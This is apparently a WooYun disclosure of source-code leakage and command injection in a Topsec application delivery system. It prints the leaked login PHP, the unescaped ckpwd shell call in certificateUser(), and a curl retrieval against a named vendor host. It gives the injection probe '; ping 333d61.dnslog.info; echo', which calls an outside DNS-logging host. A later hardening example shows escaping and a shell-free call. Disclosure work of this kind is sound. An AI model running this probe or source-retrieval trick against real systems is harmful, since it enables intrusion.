Vulnerability summary

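Bug ID: wooyun-2015-0105415

Title: Topsec application delivery system source code disclosure + command execution found instantly with the cloudeye tool

Vendor: Topsec (天融信)

Author: Alen

Submitted: 2015-04-02 18:46

Fixed: 2015-05-24 18:08

Disclosed: 2015-05-24 18:08

Vulnerability type: Sensitive information disclosure

Severity: Medium

Self-assessed rank: 8

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]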


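Vulnerability details

Disclosure status:

2015-04-02: Details sent to the vendor; awaiting vendor response
2015-04-09: Vendor confirmed; details disclosed to the vendor only
2015-04-19: Details disclosed to core white hats and experts in related fields
2015-04-29: Details disclosed to regular white hats
2015-05-09: Details disclosed to trainee white hats
2015-05-24: Details disclosed to the public

Brief description:

Topsec application delivery system source code disclosure
Topsec was founded in 1995 and is headquartered in Beijing. As a leading company in China's information security industry, Topsec's people have for years drawn on a strong sense of national mission and responsibility and upheld the talent philosophy of "bringing together talent from everywhere to build trusted networks", successfully building TOPSEC into a leading brand in China's information security industry.

Detailed description: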

http://mail.topsec.com.cn:8888/login.php. 
http://mail.topsec.com.cn:8888/login_check.php.
http://mail.topsec.com.cn:8888/logout.php.
http://mail.topsec.com.cn:8888/redirect.php.


<?php
include_once dirname(__FILE__)."/acc/common/uiResources.inc";
require_once dirname(__FILE__)."/acc/common/config/item/configItem.inc";
require_once dirname(__FILE__)."/acc/common/constant.inc";
$error = $_REQUEST['error'];
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML xmlns="http://www.w3.org/1999/xhtml"><HEAD>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<TITLE>
<?php echo PRODUCT_NAME_STRING?>
</TITLE>
<meta http-equiv="pragram" content="no-cache">
<meta http-equiv="expires" content="0">
<STYLE type=text/css>
BODY {
MARGIN: 0px;
background-color: #ffffff;
}
input.SmallButtonStyle
{
color: #FFFFFF;
background:#017BC4;
font:bold 14px Arial;
width: 70px;
height:30px;
border-width :3px;
border-style:ridge;
border-color:#CCCCCC;
vertical-align:middle;
text-align:center;
cursor: pointer;
}
.style10 {
font-size: 13px;
color: #FFFFFF;
}
</STYLE>
<LINK href="css/css.css" type=text/css rel=stylesheet>
<META content="MSHTML 6.00.2900.3314" name=GENERATOR>
<script language="javascript" src="js/prototype.js"></script>
<script>
function go(){
new Ajax.Request($('loginForm').action, {
parameters: "userName=" + $F('userName') + "&password=" + $F('pwd'),
onSuccess:function(r){
alert(r.responseText);
var d = r.responseText.evalJSON(true);
var str = $F('err' + d.code);
if(d.code == 0){
if(confirm(d.user + str)){
window.location = 'redirect.php';
}else{
window.location = 'logout.php';
}
}else if(d.code == 1){
alert(str);
}else{
window.location = 'redirect.php';
}
}
});
}
Event.observe(window, 'load', function(){
$('userName').focus();
<?php if(isset($error)){?>
alert($F('err1'));
<?php }?>
});
</script>
<style type="text/css">
<!--
.style11 {color: #017BC4}
-->
</style>
</HEAD>
<BODY>
<span class="style11"></span>
<input type="hidden" id="err0" value="<?php echo LOGIN_INTERRUPT?>"/>
<input type="hidden" id="err1" value="<?php echo LOGIN_ERROR_STRING?>"/>
<input type="hidden" id="err2" value=""/>
<table width="100%" height="90%">
<tr align="center">
<td height="360">
<table width="460" height="275" background="images/login-background.jpg">
<tr>
<td width="44" height="90" align="center">&nbsp;</td>
<td width="181" height="90" align="center"></td>
<td width="219" vAlign="bottom" align="right">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</td>
</tr>
<tr>
<td height="22" align="center">&nbsp;</td>
<td height="22" align="center">&nbsp;</td>
<TD ><!-- #EndLibraryItem --></TD>
</tr>
<tr>
<td height="38" align="center">&nbsp;</td>
<td height="38" colspan="2" align="center">
<CENTER>
<FORM action="login_check.php" id="loginForm" method=post>
<TABLE border=0>
<TBODY>
<TR align=middle>
<TD width="97" align="right"><strong><?php echo INDEX_USERNAME_STRING ?>:</strong></TD>
<TD width="230"><INPUT style="width:200px;" id=userName size=28 name='userName'></TD>
</TR>
<TR align=middle>
<TD align="right"><strong><?php echo INDEX_PASSWORD_STRING ?>:</strong></TD>
<TD><INPUT style="width:200px; " id="pwd" type=password size=28 name='password'></TD>
</TR>
<TR align=middle>
<TD height="44" colspan="1"> </TD>
<TD align="left"><INPUT type='image' src='<?php echo LOGIN_IMAGE ?>' align="top" value="aaaa" ></INPUT></TD>
</TR></TBODY></TABLE>
</FORM></CENTER></td>
</tr>
<tr>
<td height="27" align="center">&nbsp;</td>
<td height="27" align="center">&nbsp;</td>
<td align="center">&nbsp;</td>
</tr>
</table>
</td>
</tr>
</table>
<TABLE cellSpacing=0 cellPadding=0 width=1024 border=0>
<TBODY>
<TR>
<TD align=middle height=46><span class="style10">&copy;</span><FONT
color=white><B>
<?php
echo PAGE_COPYRIGHT_STRING;
?>
&nbsp;
</B></FONT></TD></TR></TBODY></TABLE></BODY></HTML>


<?php 
require_once dirname ( __FILE__ ) . '/acc/common/log/LogUtil.inc';

session_start();
/*
$remoteIp = $_SERVER['REMOTE_ADDR'];
file_put_contents("/tmp/loginIp", $remoteIp);
$user = $_SESSION['userInfo'];
syslog(LOG_INFO, "$user login from $remoteIp");
*/
logger('auth', 'User Auth', LOG_ACTION_LOGIN);
header("Location:/");
?>


<?php
require_once dirname ( __FILE__ ) . '/acc/common/log/LogUtil.inc';
session_start();
logger('auth', 'User Auth', LOG_ACTION_LOGOUT);
$remote = $_SERVER['REMOTE_ADDR'];// . ':' . $_SERVER['REMOTE_PORT'];
$line = file_get_contents('/tmp/loginIp');

if($remote == $line)
file_put_contents("/tmp/loginIp", '');
$user = $_SESSION['userInfo'];
syslog(LOG_INFO, "$user logout from $remoteIp");
$_SESSION = array();
if (isset($_COOKIE[session_name()])) {
setcookie(session_name(), '', time()-42000, '/');
}
session_destroy();
header("Location:/");
?>


<?php
require_once dirname ( __FILE__ ) . "/acc/common/uiResources.inc";
require_once dirname ( __FILE__ ) . "/acc/common/userManager.inc";
require_once dirname ( __FILE__ ) . '/acc/common/commandWrapper.inc';
session_start();
$userManager = new UserManager();
$userName = "";
$password = "";
if(isset($_REQUEST["userName"])){
$userName = $_REQUEST["userName"];
$password = $_REQUEST["password"];
}
if($userManager->certificateUser($userName,$password)){
header("location: redirect.php");
}else{
header("location: login.php?error=1");
}
?>




It's too complicated and reading the code is tedious, so let's just test for command execution black-box.

; ping 333d61.dnslog.info; echo




Proof of vulnerability:

curl 'http://mail.topsec.com.cn:8888/login_check.php.'
<?php
require_once dirname ( __FILE__ ) . "/acc/common/uiResources.inc";
require_once dirname ( __FILE__ ) . "/acc/common/userManager.inc";
require_once dirname ( __FILE__ ) . '/acc/common/commandWrapper.inc';
session_start();
$userManager = new UserManager();
$userName = "";
$password = "";
if(isset($_REQUEST["userName"])){
$userName = $_REQUEST["userName"];
$password = $_REQUEST["password"];
}
if($userManager->certificateUser($userName,$password)){
header("location: redirect.php");
}else{
header("location: login.php?error=1");
}
?>


public function certificateUser($user,$pass){
$logined = false;

//if(strcasecmp($user,"admin")!=0){
// return false;
//}

$validateUserPassFormat= APPEX_CMD_LOC.'ckpwd %s %s';
$command = sprintf($validateUserPassFormat,$user,$pass);
$result = execute($command);
$status = $result->get('retValue');
if($status ==0){
$_SESSION['userInfo']=$user;
$userDao = new UserDao();
$user = $userDao->getUserFromUserName($user);
$_SESSION['userType']=$user->getUserType();
$logined = true;
}
return $logined;
}
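
A hardened counterpart to the command construction in certificateUser() above, as an added example that is not part of the original report or the vendor's code. APPEX_CMD_LOC and ckpwd are named on the page; the path value, the helper names and the user-name allow-list are assumptions.

```php
<?php
// Added example, not the vendor's code. APPEX_CMD_LOC and ckpwd are named on
// the page; the path value, helper names and user-name policy are assumed.
const APPEX_CMD_LOC = '/opt/appex/bin/';            // placeholder path (assumption)

// Pattern from certificateUser(): request data is formatted into a shell string.
function buildCommandVulnerable(string $user, string $pass): string
{
    return sprintf(APPEX_CMD_LOC . 'ckpwd %s %s', $user, $pass);
}

// Option 1: allow-list the user name, then quote every argument for the shell.
function buildCommandEscaped(string $user, string $pass): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_.-]{1,32}\z/', $user) || strpos($pass, "\0") !== false) {
        return null;                                // reject before any shell is involved
    }
    return escapeshellarg(APPEX_CMD_LOC . 'ckpwd') . ' '
         . escapeshellarg($user) . ' ' . escapeshellarg($pass);
}

// Option 2 (PHP >= 7.4): an array command makes proc_open() start the program
// directly, without a shell, so metacharacters in $user/$pass are plain bytes.
// The password is still visible in the process list; passing it on stdin would
// be better if ckpwd supports that (unknown from the page).
function runCkpwdNoShell(string $user, string $pass): int
{
    $spec = [0 => ['file', '/dev/null', 'r'], 1 => ['file', '/dev/null', 'w'], 2 => ['file', '/dev/null', 'w']];
    $proc = proc_open([APPEX_CMD_LOC . 'ckpwd', $user, $pass], $spec, $pipes);
    if (!is_resource($proc)) {
        return 127;                                 // spawn failure counts as login failure
    }
    return proc_close($proc);                       // exit status; 0 means success, as in the original
}

// Constructed inputs: the string quoted on the page, and a password with a quote.
$probe = '; ping 333d61.dnslog.info; echo';
echo buildCommandVulnerable($probe, 'x'), "\n";     // a shell would parse this as several commands
var_dump(buildCommandEscaped($probe, 'x'));         // refused by the allow-list
echo buildCommandEscaped('admin', "p'w d"), "\n";   // each value stays one quoted argument
```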


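Remediation:

Copyright notice: when reposting, please credit the source Alen@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed: 2015-04-09 18:07

Vendor reply:

Thank you for reporting the vulnerability; the product issue is being fixed.

Latest status:

None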